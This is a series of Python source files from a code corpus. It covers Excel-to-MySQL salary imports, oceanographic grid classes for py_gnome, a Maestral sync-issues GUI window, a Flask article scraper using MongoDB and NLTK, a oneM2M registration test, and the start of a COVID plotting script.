workbookSheets.sheet_names:\n if(sheet != \"Index\"):\n\n monthlySalariesDataFeed = panda.read_excel(\"../raw_data/censtats_data/monthlyPay_data.xlsx\", sheet_name=sheet)\n \n sheetKeys = []\n \n #Get sheet year\n sheetName = sheet\n sheetName = sheetName.replace(\"E\", \"\")\n\n\n #Get list of column names\n columns = list(monthlySalariesDataFeed)\n\n\n #Import query template\n importBulkMonthlyPayAmountDataQuery = \"INSERT IGNORE INTO `censtats_monthlypay_amount_data` (`year`,\"\n\n importBulkMonthlyPayChangeDataQuery = \"INSERT IGNORE INTO `censtats_monthlypay_change_data` (`year`,\"\n\n\n #Store selected data and columns\n tempBulkMonthlyPayColumnsSelect = \"\"\n\n tempBulkMonthlyPayAmountDataSelect = \"'\" + sheetName + \"',\"\n tempBulkMonthlyPayChangeDataSelect = \"'\" + sheetName + \"',\"\n \n #Make table fields from catagories and subcategories\n\n categoryIndexTarget = 0\n\n earnerAllCategories = list(monthlySalariesDataFeed[columns[0]])\n earnerAmount = list(monthlySalariesDataFeed[columns[1]])\n earnerChange = list(monthlySalariesDataFeed[columns[2]])\n\n #print(earnerAmount)\n #Interate through all rows\n while(categoryIndexTarget < len(list(earnerAllCategories))):\n if(\"By \" in str(earnerAllCategories[categoryIndexTarget])):\n \n #Create category name for table column\n categoryName = str(earnerAllCategories[categoryIndexTarget])\n categoryName = categoryName.replace(\"By \", \"\")\n\n #Check for numbers in format \"( number )\" and remove\n categoryName = removeFootnoteTags(categoryName)\n\n categoryName = categoryName.replace(\")\", \"\")\n\n categoryName = categoryName.replace(\" \", \"_\")\n\n categoryName = shortenColumn(categoryName)\n\n \n #Find how many subcategories to count before reaching next category\n subcategoryIndexTarget = categoryIndexTarget + 1 #Start off on next line after the By line\n\n\n\n #Get subcategory from category\n for x in range(len(earnerAllCategories)):\n if(earnerAllCategories[subcategoryIndexTarget] == \"Notes : \"):\n break;\n elif(\"By \" in str(earnerAllCategories[subcategoryIndexTarget])): #End of category\n break;\n else:\n subcategoryName = str(earnerAllCategories[subcategoryIndexTarget])\n \n \n\n #Check for numbers in format \"( number )\" and remove\n subcategoryName = removeFootnoteTags(subcategoryName)\n\n #Check and strip punctuation\n punctuationBlacklist = \"!@#$%^&*_+-=/\\|.,;:≥)\";\n for punctuationCursor in subcategoryName:\n if punctuationCursor in punctuationBlacklist:\n subcategoryName = subcategoryName.replace(punctuationCursor, \"\")\n\n \n\n subcategoryName = subcategoryName.replace(\" \", \"_\")\n \n subcategoryName = subcategoryName.lower()\n \n subcategoryName = shortenColumn(subcategoryName)\n\n \n #Remove empty rows that include nan\n if(subcategoryName != \"nan\"):\n \n sheetKeys.append(categoryName+\"-\"+subcategoryName)\n\n \n #print(categoryName+\"-\"+subcategoryName)\n \n \n\n subcategoryIndexTarget += 1\n \n categoryIndexTarget += 1 \n elif(str(earnerAllCategories[categoryIndexTarget]) == \"Notes : \"):\n\n for column in sheetKeys:\n tempBulkMonthlyPayColumnsSelect = tempBulkMonthlyPayColumnsSelect + \"`\" + column + \"`,\"\n for x in range(len(earnerAllCategories)):\n \n\n if(str(earnerAmount[x]) != \"nan\" and str(earnerAmount[x]) != \"Median monthly wage (HK$)\"):\n tempBulkMonthlyPayAmountDataSelect = tempBulkMonthlyPayAmountDataSelect + \"'\" + str(earnerAmount[x]) + \"',\"\n if(str(earnerChange[x]) != \"nan\" and str(earnerChange[x]) != \"Year-on-year % change\"):\n tempBulkMonthlyPayChangeDataSelect = tempBulkMonthlyPayChangeDataSelect + \"'\" + str(earnerChange[x]) + \"',\"\n\n tempBulkMonthlyPayAmountDataSelect = tempBulkMonthlyPayAmountDataSelect[:-1]\n\n tempBulkMonthlyPayChangeDataSelect = tempBulkMonthlyPayChangeDataSelect[:-1]\n \n tempBulkMonthlyPayColumnsSelect = tempBulkMonthlyPayColumnsSelect[:-1]\n\n\n\n #Compile queries together\n importBulkMonthlyPayAmountDataQuery = importBulkMonthlyPayAmountDataQuery + tempBulkMonthlyPayColumnsSelect + \") VALUES (\" + tempBulkMonthlyPayAmountDataSelect + \");\"\n\n importBulkMonthlyPayChangeDataQuery = importBulkMonthlyPayChangeDataQuery + tempBulkMonthlyPayColumnsSelect + \") VALUES (\" + tempBulkMonthlyPayChangeDataSelect + \");\"\n\n importBulkMonthlyPayAmountData = cursor.execute(importBulkMonthlyPayAmountDataQuery)\n\n connection.commit()\n\n importBulkMonthlyPayChangeData = cursor.execute(importBulkMonthlyPayChangeDataQuery)\n\n connection.commit()\n\n print(\"Monthly salary amounts for \"+sheetName+\" and changes updated\")\n break;\n \n else:\n categoryIndexTarget +=1 ","sub_path":"import/import_monthlysalary_data.py","file_name":"import_monthlysalary_data.py","file_ext":"py","file_size_in_byte":18959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29249623","text":"import datetime\nimport StringIO\nimport copy\nimport numpy as np\n\nfrom colander import (SchemaNode, SequenceSchema,\n Sequence, String, Boolean, DateTime,\n drop)\n\nimport gridded\n\nfrom gnome.persist import base_schema\nfrom gnome.gnomeobject import GnomeId\nfrom gnome.persist.extend_colander import FilenameSchema\nfrom gnome.persist.base_schema import GeneralGnomeObjectSchema\nfrom gnome.persist.validators import convertible_to_seconds\nfrom gnome.persist.extend_colander import LocalDateTime\nfrom gnome.utilities.inf_datetime import InfDateTime\n\n\nclass TimeSchema(base_schema.ObjTypeSchema):\n filename = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n varname = SchemaNode(\n String(), read_only=True\n )\n data = SequenceSchema(\n SchemaNode(\n DateTime(default_tzinfo=None)\n )\n )\n\n\nclass GridSchema(base_schema.ObjTypeSchema):\n name = SchemaNode(String(), test_equal=False) #remove this once gridded stops using _def_count\n filename = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n\nclass DepthSchema(base_schema.ObjTypeSchema):\n filename = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n\n\nclass VariableSchemaBase(base_schema.ObjTypeSchema):\n #filename\n #data?\n units = SchemaNode(String())\n time = TimeSchema(\n save_reference=True\n )\n grid = GridSchema(\n save_reference=True\n )\n data_file = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n grid_file = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n extrapolation_is_allowed = SchemaNode(Boolean())\n data_start = SchemaNode(LocalDateTime(), read_only=True,\n validator=convertible_to_seconds)\n data_stop = SchemaNode(LocalDateTime(), read_only=True,\n validator=convertible_to_seconds)\n\n\nclass VariableSchema(VariableSchemaBase):\n varname = SchemaNode(\n String(), missing=drop, read_only=True\n )\n\n\nclass VectorVariableSchema(VariableSchemaBase):\n varnames = SequenceSchema(\n SchemaNode(String()),\n read_only=True\n )\n variables = SequenceSchema(\n GeneralGnomeObjectSchema(\n acceptable_schemas=[VariableSchema, base_schema.ObjTypeSchema]\n ), save_reference=True\n )\n\n\nclass Time(gridded.time.Time, GnomeId):\n\n _schema = TimeSchema\n\n @classmethod\n def from_file(cls, filename=None, **kwargs):\n if isinstance(filename, list):\n filename = filename[0]\n\n t = []\n\n with open(filename, 'r') as fd:\n for line in fd:\n line = line.rstrip()\n if line is not None:\n t.append(datetime.datetime.strptime(line, '%c'))\n\n return Time(t)\n\n\nclass Grid_U(gridded.grids.Grid_U, GnomeId):\n\n _schema = GridSchema\n\n def draw_to_plot(self, ax, features=None, style=None):\n import matplotlib\n def_style = {'color': 'blue',\n 'linestyle': 'solid'}\n s = def_style.copy()\n\n if style is not None:\n s.update(style)\n\n lines = self.get_lines()\n lines = matplotlib.collections.LineCollection(lines, **s)\n\n ax.add_collection(lines)\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n\n return rv\n\n def get_cells(self):\n return self.nodes[self.faces]\n\n def get_lines(self):\n '''\n Returns an array of lengths, and a list of line arrays.\n The first array sequentially indexes the second array.\n When the second array is split up using the first array\n and the resulting lines are drawn, you should end up with a picture of\n the grid.\n '''\n open_cells = self.nodes[self.faces]\n closed_cells = np.concatenate((open_cells, open_cells[:, None, 0]),\n axis=1)\n closed_cells = closed_cells.astype(np.float32, copy=False)\n lengths = closed_cells.shape[1] * np.ones(closed_cells.shape[0],\n dtype=np.int32)\n\n return (lengths, [closed_cells])\n\n def get_nodes(self):\n return self.nodes[:]\n\n def get_centers(self):\n if self.face_coordinates is None:\n self.build_face_coordinates()\n return self.face_coordinates\n\n def get_metadata(self):\n json_ = {}\n json_['nodes_shape'] = self.nodes.shape\n json_['num_nodes'] = self.nodes.shape[0]\n json_['num_cells'] = self.faces.shape[0]\n return json_\n\n\nclass Grid_S(GnomeId, gridded.grids.Grid_S):\n\n _schema = GridSchema\n\n '''hack to avoid problems when registering object in webgnome'''\n @property\n def non_grid_variables(self):\n return None\n\n def draw_to_plot(self, ax, features=None, style=None):\n def_style = {'node': {'color': 'green',\n 'linestyle': 'dashed',\n 'marker': 'o'},\n 'center': {'color': 'blue',\n 'linestyle': 'solid'},\n 'edge1': {'color': 'purple'},\n 'edge2': {'color': 'olive'}}\n\n if features is None:\n features = ['node']\n st = def_style.copy()\n\n if style is not None:\n for k in style.keys():\n st[k].update(style[k])\n\n for f in features:\n s = st[f]\n lon, lat = self._get_grid_vars(f)\n\n ax.plot(lon, lat, **s)\n ax.plot(lon.T, lat.T, **s)\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n return rv\n\n def get_cells(self):\n if not hasattr(self, '_cell_trees'):\n self.build_celltree()\n\n ns = self._cell_trees['node'][1]\n fs = self._cell_trees['node'][2]\n\n return ns[fs]\n\n def get_nodes(self):\n if not hasattr(self, '_cell_trees'):\n self.build_celltree()\n\n n = self._cell_trees['node'][1]\n\n return n\n\n def get_centers(self):\n if self.center_lon is None:\n lons = (self.node_lon[0:-1, 0:-1] + self.node_lon[1:, 1:]) / 2\n lats = (self.node_lat[0:-1, 0:-1] + self.node_lat[1:, 1:]) / 2\n return np.stack((lons, lats), axis=-1).reshape(-1, 2)\n else:\n return self.centers.reshape(-1, 2)\n\n def get_metadata(self):\n if not hasattr(self, '_cell_trees'):\n self.build_celltree()\n json_ = {}\n json_['nodes_shape'] = self.nodes.shape\n json_['num_nodes'] = self.nodes.shape[0] * self.nodes.shape[1]\n json_['num_cells'] = self._cell_trees['node'][2].shape[0]\n return json_\n\n def get_lines(self):\n '''\n Returns an array of lengths, and a list of line arrays.\n The first array sequentially indexes the second array.\n When the second array is split up using the first array\n and the resulting lines are drawn, you should end up with a picture of\n the grid.\n '''\n hor_lines = (np.dstack((self.node_lon[:], self.node_lat[:])).astype(np.float32))\n ver_lines = (hor_lines.transpose((1, 0, 2)).astype(np.float32))\n\n hor_lens = hor_lines.shape[1] * np.ones(hor_lines.shape[0],\n dtype=np.int32)\n ver_lens = ver_lines.shape[1] * np.ones(ver_lines.shape[0],\n dtype=np.int32)\n lens = np.concatenate((hor_lens, ver_lens))\n\n return (lens, [hor_lines, ver_lines])\n\n\nclass Grid_R(gridded.grids.Grid_R, GnomeId):\n\n _schema = GridSchema\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n return rv\n\n def get_nodes(self):\n return self.nodes.reshape(-1, 2)\n\n def get_centers(self):\n return self.centers.reshape(-1, 2)\n\n def get_cells(self):\n return np.concatenate(self.node_lon, self.node_lat)\n\n def get_lines(self):\n\n lon_lines = np.array([[(lon, self.node_lat[0]),\n (lon, self.node_lat[len(self.node_lat) / 2]),\n (lon, self.node_lat[-1])]\n for lon in self.node_lon], dtype=np.float32)\n lat_lines = np.array([[(self.node_lon[0], lat),\n (self.node_lon[len(self.node_lon) / 2], lat),\n (self.node_lon[-1], lat)]\n for lat in self.node_lat], dtype=np.float32)\n\n lon_lens = lon_lines.shape[1] * np.ones(lon_lines.shape[0],\n dtype=np.int32)\n lat_lens = lat_lines.shape[1] * np.ones(lat_lines.shape[0],\n dtype=np.int32)\n lens = np.concatenate((lon_lens, lat_lens))\n\n return (lens, [lon_lines, lat_lines])\n\n\nclass PyGrid(gridded.grids.Grid):\n\n @staticmethod\n def from_netCDF(*args, **kwargs):\n kwargs['_default_types'] = (('ugrid', Grid_U),\n ('sgrid', Grid_S),\n ('rgrid', Grid_R))\n\n return gridded.grids.Grid.from_netCDF(*args, **kwargs)\n\n @staticmethod\n def new_from_dict(dict_):\n return PyGrid.from_netCDF(**dict_)\n\n @staticmethod\n def _get_grid_type(*args, **kwargs):\n kwargs['_default_types'] = (('ugrid', Grid_U),\n ('sgrid', Grid_S),\n ('rgrid', Grid_R))\n\n return gridded.grids.Grid._get_grid_type(*args, **kwargs)\n\n\nclass Depth(gridded.depth.Depth):\n @staticmethod\n def from_netCDF(*args, **kwargs):\n kwargs['_default_types'] = (('level', L_Depth),\n ('sigma', S_Depth),\n ('surface', DepthBase))\n\n return gridded.depth.Depth.from_netCDF(*args, **kwargs)\n\n @staticmethod\n def _get_depth_type(*args, **kwargs):\n kwargs['_default_types'] = (('level', L_Depth),\n ('sigma', S_Depth),\n ('surface', DepthBase))\n\n return gridded.depth.Depth._get_depth_type(*args, **kwargs)\n\n\nclass Variable(gridded.Variable, GnomeId):\n _schema = VariableSchema\n\n default_names = []\n cf_names = []\n\n _default_component_types = copy.deepcopy(gridded.Variable\n ._default_component_types)\n _default_component_types.update({'time': Time,\n 'grid': PyGrid,\n 'depth': Depth})\n\n def __init__(self, extrapolation_is_allowed=False, *args, **kwargs):\n self.extrapolation_is_allowed = extrapolation_is_allowed\n super(Variable, self).__init__(*args, **kwargs)\n\n def at(self, *args, **kwargs):\n if ('extrapolate' not in kwargs):\n kwargs['extrapolate'] = False\n if ('unmask' not in kwargs):\n kwargs['unmask'] = True\n\n return super(Variable, self).at(*args, **kwargs)\n\n @classmethod\n def new_from_dict(cls, dict_):\n if 'data' not in dict_:\n return cls.from_netCDF(**dict_)\n\n return super(Variable, cls).new_from_dict(dict_)\n\n @property\n def extrapolation_is_allowed(self):\n if self.time is not None:\n return self.time.min_time == self.time.max_time or self._extrapolation_is_allowed\n else:\n return self._extrapolation_is_allowed\n\n @extrapolation_is_allowed.setter\n def extrapolation_is_allowed(self, e):\n self._extrapolation_is_allowed = e\n\n @property\n def data_start(self):\n if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n return InfDateTime(\"-inf\")\n else:\n return self.time.min_time.replace(tzinfo=None)\n\n @property\n def data_stop(self):\n if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n return InfDateTime(\"inf\")\n else:\n return self.time.min_time.replace(tzinfo=None)\n\n\nclass DepthBase(gridded.depth.DepthBase, GnomeId):\n\n _schema = DepthSchema\n\n _default_component_types = copy.deepcopy(gridded.depth.DepthBase\n ._default_component_types)\n _default_component_types.update({'time': Time,\n 'grid': PyGrid,\n 'variable': Variable})\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n return rv\n\n def interpolation_alphas(self, points, time, data_shape, _hash=None, **kwargs):\n return (None, None)\n\n\nclass L_Depth(gridded.depth.L_Depth, GnomeId):\n _schema = DepthSchema\n\n _default_component_types = copy.deepcopy(gridded.depth.L_Depth\n ._default_component_types)\n _default_component_types.update({'time': Time,\n 'grid': PyGrid,\n 'variable': Variable})\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n return rv\n\n\nclass S_Depth(gridded.depth.S_Depth, GnomeId):\n\n _schema = DepthSchema\n\n _default_component_types = copy.deepcopy(gridded.depth.S_Depth\n ._default_component_types)\n _default_component_types.update({'time': Time,\n 'grid': PyGrid,\n 'variable': Variable})\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n return rv\n\nclass VectorVariable(gridded.VectorVariable, GnomeId):\n\n _schema = VectorVariableSchema\n\n _default_component_types = copy.deepcopy(gridded.VectorVariable\n ._default_component_types)\n _default_component_types.update({'time': Time,\n 'grid': PyGrid,\n 'depth': Depth,\n 'variable': Variable})\n\n @classmethod\n def new_from_dict(cls, dict_, **kwargs):\n if not dict_.get('variables', False):\n return super(VectorVariable, cls).new_from_dict(cls.from_netCDF(**dict_).to_dict(), **kwargs)\n else:\n return super(VectorVariable, cls).new_from_dict(dict_, **kwargs)\n\n def get_data_vectors(self):\n '''\n return array of shape (time_slices, len_linearized_data,2)\n first is magnitude, second is direction\n '''\n raw_u = self.variables[0].data[:]\n raw_v = self.variables[1].data[:]\n\n if self.depth is not None:\n raw_u = raw_u[:, self.depth.surface_index]\n raw_v = raw_v[:, self.depth.surface_index]\n\n if np.any(np.array(raw_u.shape) != np.array(raw_v.shape)):\n # must be roms-style staggered\n raw_u = (raw_u[:, 0:-1, :] + raw_u[:, 1:, :]) / 2\n raw_v = (raw_v[:, :, 0:-1] + raw_v[:, :, 1:]) / 2\n\n raw_u = raw_u.reshape(raw_u.shape[0], -1)\n raw_v = raw_v.reshape(raw_v.shape[0], -1)\n #r = np.ma.stack((raw_u, raw_v)) change to this when numpy 1.15 becomes norm.\n r = np.ma.concatenate((raw_u[None,:], raw_v[None,:]))\n\n return np.ascontiguousarray(r.filled(0), np.float32)\n\n def get_metadata(self):\n json_ = {}\n json_['data_location'] = self.grid.infer_location(self.variables[0].data)\n return json_\n\n @property\n def extrapolation_is_allowed(self):\n if self.time is not None:\n return self.time.min_time == self.time.max_time or self._extrapolation_is_allowed\n else:\n return self._extrapolation_is_allowed\n\n @extrapolation_is_allowed.setter\n def extrapolation_is_allowed(self, e):\n self._extrapolation_is_allowed = e\n\n @property\n def data_start(self):\n if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n return InfDateTime(\"-inf\")\n else:\n return self.time.min_time.replace(tzinfo=None)\n\n @property\n def data_stop(self):\n if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n return InfDateTime(\"inf\")\n else:\n return self.time.min_time.replace(tzinfo=None)\n","sub_path":"py_gnome/gnome/environment/gridded_objects_base.py","file_name":"gridded_objects_base.py","file_ext":"py","file_size_in_byte":16545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"220677742","text":"# -*- coding: utf-8 -*-\n\n# system imports\nimport os.path as osp\nimport asyncio\nimport urllib.parse\nfrom typing import List, Any\n\n# external imports\nimport toga\nfrom toga.style.pack import Pack\nfrom toga.constants import ROW, COLUMN\nfrom maestral.daemon import MaestralProxy\n\n# local imports\nfrom .private.widgets import Label, FollowLinkButton, Icon, Window\nfrom .private.constants import WORD_WRAP\n\n\nPADDING = 10\nICON_SIZE = 48\nWINDOW_SIZE = (370, 400)\n\n\nclass SyncIssueView(toga.Box):\n\n dbx_address = \"https://www.dropbox.com/preview\"\n\n def __init__(self, sync_err: dict) -> None:\n super().__init__(style=Pack(direction=COLUMN))\n\n self.sync_err = sync_err\n dbx_address = self.dbx_address + urllib.parse.quote(self.sync_err[\"dbx_path\"])\n\n icon = Icon(for_path=self.sync_err[\"local_path\"])\n # noinspection PyTypeChecker\n image_view = toga.ImageView(\n image=icon,\n style=Pack(\n width=ICON_SIZE,\n height=ICON_SIZE,\n padding=(0, 12, 0, 3),\n ),\n )\n\n path_label = Label(\n osp.basename(self.sync_err[\"local_path\"]),\n style=Pack(\n padding_bottom=PADDING / 2,\n ),\n )\n error_label = Label(\n self.sync_err[\"title\"] + \":\\n\" + self.sync_err[\"message\"],\n linebreak_mode=WORD_WRAP,\n style=Pack(\n font_size=11,\n width=WINDOW_SIZE[0] - 4 * PADDING - 15 - ICON_SIZE,\n padding_bottom=PADDING / 2,\n ),\n )\n\n link_local = FollowLinkButton(\n \"Show in Finder\",\n url=self.sync_err[\"local_path\"],\n enabled=osp.exists(self.sync_err[\"local_path\"]),\n locate=True,\n style=Pack(\n padding_right=PADDING,\n font_size=11,\n height=12,\n ),\n )\n link_dbx = FollowLinkButton(\n \"Show Online\",\n url=dbx_address,\n style=Pack(font_size=11, height=12),\n )\n\n link_box = toga.Box(\n children=[link_local, link_dbx],\n style=Pack(direction=ROW),\n )\n info_box = toga.Box(\n children=[path_label, error_label, link_box],\n style=Pack(direction=COLUMN, flex=1),\n )\n content_box = toga.Box(\n children=[image_view, info_box],\n style=Pack(direction=ROW),\n )\n\n hline = toga.Divider(style=Pack(padding=(PADDING, 0, PADDING, 0)))\n\n self.add(content_box, hline)\n\n\nclass SyncIssuesWindow(Window):\n def __init__(self, mdbx: MaestralProxy, app: toga.App) -> None:\n super().__init__(title=\"Maestral Sync Issues\", release_on_close=False, app=app)\n self.on_close = self.on_close_pressed\n\n self.mdbx = mdbx\n self._cached_errors: List[dict] = []\n\n self._refresh = False\n self._refresh_interval = 1\n\n self.size = WINDOW_SIZE\n\n placeholder_label = Label(\n \"No sync issues 😊\",\n style=Pack(padding_bottom=PADDING),\n )\n\n self.sync_errors_box = toga.Box(\n children=[placeholder_label],\n style=Pack(\n direction=COLUMN,\n padding=2 * PADDING,\n ),\n )\n self.scroll_container = toga.ScrollContainer(\n content=self.sync_errors_box,\n horizontal=False,\n )\n\n self.content = self.scroll_container\n self.center()\n\n self.refresh_gui()\n\n async def periodic_refresh_gui(self, sender: Any = None) -> None:\n\n while self._refresh:\n self.refresh_gui()\n await asyncio.sleep(self._refresh_interval)\n\n def refresh_gui(self) -> None:\n\n new_errors = self.mdbx.sync_errors\n\n if new_errors != self._cached_errors:\n\n # remove old errors\n for child in self.sync_errors_box.children.copy():\n self.sync_errors_box.remove(child)\n\n # add new errors\n if len(new_errors) == 0:\n placeholder_label = Label(\n \"No sync issues 😊\",\n style=Pack(padding_bottom=PADDING),\n )\n self.sync_errors_box.add(placeholder_label)\n else:\n for e in new_errors:\n self.sync_errors_box.add(SyncIssueView(e))\n\n self._cached_errors = new_errors\n\n def on_close_pressed(self, sender: Any = None) -> bool:\n self._refresh = False\n return True\n\n def show(self) -> None:\n self._refresh = True\n self.app.add_background_task(self.periodic_refresh_gui)\n super().show()\n","sub_path":"src/maestral_cocoa/syncissues.py","file_name":"syncissues.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"351932397","text":"from __future__ import print_function # In python 2.7\nfrom werkzeug.exceptions import NotFound, ServiceUnavailable\n#from services import root_dir, nice_json\nfrom flask import Flask, request, jsonify\n\nfrom pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom urlparse import urlparse\nfrom urllib2 import Request\nimport nltk\nimport sys\n#import requests\nimport urllib2\nimport json\nimport re\n\napp = Flask(__name__)\n\nclient = MongoClient()\ndb = client.researchify\n\n@app.route(\"/parse\", methods=['POST'])\ndef parse():\n\turl = request.get_json(force=True)[\"url\"]\n\tparsed_uri = urlparse( 'http://stackoverflow.com/questions/1234567/blah-blah-blah-blah' )\n\tdomain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n\n\treq = urllib2.Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n\thtml = urllib2.urlopen(req).read()\n\tsoup = BeautifulSoup(html)\n\n\t# Get title from h1\n\ttitle = soup.find(\"title\").get_text()\n\ttitle = re.sub(r'\\W+', ' ', title)\n\n\t# Get page content\n\tcontent = soup.find(\"body\")\n\n\tif content.find(\"main\"):\n\t\tcontent = content.find(\"main\")\n\n\tif content.find(\"article\"):\n\t\tcontent = content.find(\"article\")\n\n\t# Find author BEFORE it's blacklisted.\n\tauthor = find_author(content, ['div', 'p', 'span', 'a', 'ul', 'li'])\n\n\t# Remove tags\n\tblacklist_tags = [\"script\", \"style\", \"noscript\", \"form\", \"aside\", \"nav\", \"footer\", \"h1\", \"svg\", \"header\", \"input\", \"textarea\", \"button\", \"canvas\", \"iframe\"]\n\tfor tag in content.findAll(blacklist_tags):\n\t\ttag.extract()\n\n\tblacklist_names_substrings = ['share', 'more', 'btn', 'sidebar', 'social', 'connect', 'widget', 'next', 'comment', 'topbar', 'nav', 'footer', 'hidden', 'share', 'author']\n\tfor tag in content.findAll(['a', 'section', 'div', 'ul', 'li', 'span']):\n\t\tif tag.get(\"class\"):\n\t\t\tfor className in tag.get(\"class\"):\n\t\t\t\tfor name in blacklist_names_substrings:\n\t\t\t\t\tif name in className:\n\t\t\t\t\t\ttag.extract()\n\t\tif tag.get(\"id\"):\n\t\t\tfor idName in blacklist_names_substrings:\n\t\t\t\tif idName in tag.get(\"id\"):\n\t\t\t\t\ttag.extract()\n\t\tif tag.get(\"style\"):\n\t\t\tif 'display:none' in tag.get(\"style\") or 'display: none' in tag.get('style'):\n\t\t\t\ttag.extract()\n\n\t\t#if \"author\" in tag.get(\"class\"):\n\t\t#\tauthor = find_author(tag.text())\n\n\tchange_img_ratio(content)\n\n\t#remove_attrs(content, ['section', 'div'])\n\n\t# remove_attrs(content, 'div')\n\t# Add data to database\n\tif not author:\n\t\tauthor = \"Unknown Author\"\n\n\tprint(author, file=sys.stderr)\n\tresult = db.articles.insert_one({\n\t\t\"url\": url,\n\t\t\"title\": title,\n\t\t\"content\": str(content),\n\t\t\"author\": author\n\t})\n\n\treturn \"Got it.\"\n\n\ndef find_author(soup, tags):\n\tfor tag in soup.findAll(tags):\n\t\tif tag.get(\"class\"):\n\t\t\tfor className in tag.get(\"class\"):\n\t\t\t\tif 'author' in className:\n\t\t\t\t\t# Add random text in front of name for parser to work correctly. I think it could be an inherent issue with nameparser, not with the scraping.\n\t\t\t\t\tauthor = mine_author(\"By \" + tag.getText())\n\t\t\t\t\tif author:\n\t\t\t\t\t\treturn author\n\ndef mine_author(text):\n\tif not text:\n\t\treturn\n\n\tst = StanfordNERTagger('stanford-ner/english.all.3class.distsim.crf.ser.gz', 'stanford-ner/stanford-ner.jar')\n\ttokens = nltk.tokenize.word_tokenize(text)\n\tpos = nltk.pos_tag(tokens)\n\tsentt = nltk.ne_chunk(pos, binary = False)\n\tperson_list = []\n\tperson = []\n\tname = \"\"\n\tfor subtree in sentt.subtrees(filter=lambda t: t.label() == 'PERSON'):\n\t\tfor leaf in subtree.leaves():\n\t\t\tperson.append(leaf[0])\n\t\tif len(person) > 0: #avoid grabbing lone surnames\n\t\t\tfor part in person:\n\t\t\t\tname += part + ' '\n\t\t\tif name[:-1] not in person_list:\n\t\t\t\tperson_list.append(name[:-1])\n\t\t\tname = ''\n\t\tperson = []\n\n\t#print(person_list, file=sys.stderr)\n\tif not person_list:\n\t\treturn False\n\n\treturn \", \".join(person_list)\n\ndef removeTag(soup, tagname):\n\tfor tag in soup.findAll(tagname):\n\t\ttag.extract()\n\ndef removeClass(soup, tagname, className):\n\tfor tag in soup.findAll(tagname, className):\n\t\ttag.extract()\n\ndef removeId(soup, tagname, idName):\n\tfor tag in soup.findAll(tagname, id=idName):\n\t\ttag.extract()\n\ndef remove_attrs(soup, tag):\n for tag in soup.findAll(tag):\n tag.attrs = {}\n return soup\n\ndef removeClassTypes(tag):\n\tfor tag in content.findAll('a'):\n\t\tfor className in tag['class']:\n\t\t\tif 'btn' in className:\n\t\t\t\ttag.extract()\n\n\tfor tag in content.findAll('span'):\n\t\tfor className in tag['class']:\n\t\t\tif 'btn' in className:\n\t\t\t\ttag.extract()\n\ndef change_img_ratio(soup):\n\tfor img in soup.findAll('img'):\n\t\t#src = img['src']\n\t\t#img.attrs = {}\n\t\t#img.attrs['src'] = src\n\t\timg.attrs['height'] = 'auto'\n\t\timg.attrs['width'] = '100%'\n\treturn soup\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)\n","sub_path":"services/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"516978853","text":"from onem2m import AE\n\ncli = AE.ClientLib()\n\njson = {}\njson['ADN.ID'] = 'S0.2.481.2.100.0.41.43_AE_test001'\njson['ADN.NAME'] = 'Multisensor Device'\njson['CHECK.URI'] = 'S0.2.481.2.100.0.41.43_AE_test001'\nresult = cli.checkDuplicated(json)\nif result == 404:\n result = cli.createADN(json)\n print('> Result - create ADN: ', result)\nelif result == 200:\n print('> Result - already registered ADN: ', result)\nelse:\n print('> Result - Internal server error: ', result)\n\n","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"460605840","text":"import datetime\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport xlrd\nimport time\n\n# Spesifiserer hvilke filer som vi henter data fra\n\nlocD = \"excel/data.xls\"\n\nwbD = xlrd.open_workbook(locD)\nsheetD = wbD.sheet_by_index(0)\nsheetD.cell_value(0, 0)\n\ndays = []\ninnlagt = []\ndeaths = []\n\n\n# ----------- Metoder som henter data fra excel-ark START------------\ndef getDate(c, day, sheet):\n dayvalue = sheet.cell_value(day, c)\n y = dayvalue.split(\"T\")\n x = y[0].split(\"-\")\n date = datetime.date(int(x[0]), int(x[1]), int(x[2]))\n date_time = date.strftime('%d/%m/%Y')\n return date_time\n\n\n# Metode som henter data fra hver celle i excel\ndef getNum(i, c, sheet):\n positiv = int(sheet.cell_value(i, c))\n return positiv\n\n\n# Metode som legger dataene i lister som brukes for å interpolere D(t) og K(t)\ndef getNumbers(sheet, column, array, startrad, sluttrad):\n for i in range(sheet.nrows):\n if i < startrad:\n print()\n elif i <= sluttrad:\n array.append(int(getNum(i, column, sheet)))\n\n\n# Metode som henter innlagte fra excel-dataene innenfor spesifisert periode\ndef getInnlagt(startrad, sluttrad):\n getNumbers(sheetD, 2, innlagt, startrad, sluttrad)\n\n\n# Metode som henter dødsfall fra excel-datatene innenfor spesifisert periode\ndef 